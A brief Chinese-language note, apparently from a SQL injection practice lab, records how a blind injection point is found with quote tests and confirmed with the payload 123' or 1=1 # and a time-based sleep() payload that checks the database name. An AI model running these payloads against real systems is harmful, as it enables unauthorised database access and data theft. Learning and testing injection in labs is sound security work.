利用单引号双引号进行测试 发现网页无回显,所以注入方式为盲注,并且测试结果需要用时间注入来验证 用万能语句进行测试,双引号无反应,单引号测试成功 123' or 1=1 # 利用时间注入测试 后续测试结果与之前相同 123'or if((database()='security'),sleep(0.3),sleep(0.1))# 相关文章: